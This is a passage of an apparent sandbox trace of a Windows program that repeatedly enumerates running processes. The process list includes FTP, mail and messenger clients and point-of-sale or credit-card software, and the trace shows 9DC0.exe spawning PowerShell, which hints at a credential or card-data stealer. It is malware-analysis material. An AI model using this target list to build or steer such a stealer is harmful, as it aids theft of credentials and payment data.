pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0187.760] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0187.761] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0187.763] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0187.764] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0187.766] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0187.767] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0187.769] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0187.770] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0187.772] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0187.812] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0187.815] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0187.817] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0187.819] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0187.820] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0187.823] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0187.825] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0187.827] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0187.828] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0187.831] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0187.833] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0187.834] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0187.837] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0187.839] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0187.840] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0187.842] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0187.844] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0187.846] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0187.885] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0187.888] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0187.890] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0187.892] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0187.894] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0187.895] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0187.897] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0187.899] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0187.901] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0187.903] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0187.905] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0187.909] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0187.911] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0187.913] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0187.915] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0187.916] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0187.918] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0187.920] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0187.922] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0187.966] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0187.968] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0187.971] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0187.973] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0187.975] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0187.976] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0187.978] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0187.980] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0187.982] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0187.983] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0187.985] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0187.987] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0187.989] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0187.990] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0187.993] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0187.994] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0187.996] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0187.998] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0187.999] CloseHandle (hObject=0x17ec) returned 1 [0188.000] Sleep (dwMilliseconds=0x64) [0188.065] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0188.114] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.116] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0188.117] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0188.119] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.120] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0188.122] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.123] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0188.125] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0188.126] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0188.128] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.130] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.131] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0188.133] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.134] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.136] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.137] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.175] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.177] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, 